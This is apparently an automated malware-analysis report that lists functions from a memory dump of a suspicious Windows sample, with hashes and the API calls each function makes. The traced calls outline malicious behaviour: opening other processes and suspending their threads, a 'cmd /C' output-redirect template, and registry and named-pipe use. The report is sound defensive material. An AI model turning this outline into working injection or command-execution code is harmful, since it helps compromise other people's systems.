  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C59D7, Relevance: 7.6, APIs: 5, Instructions: 83 Total matches: 27memorytime
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5B7B, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 25memory
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
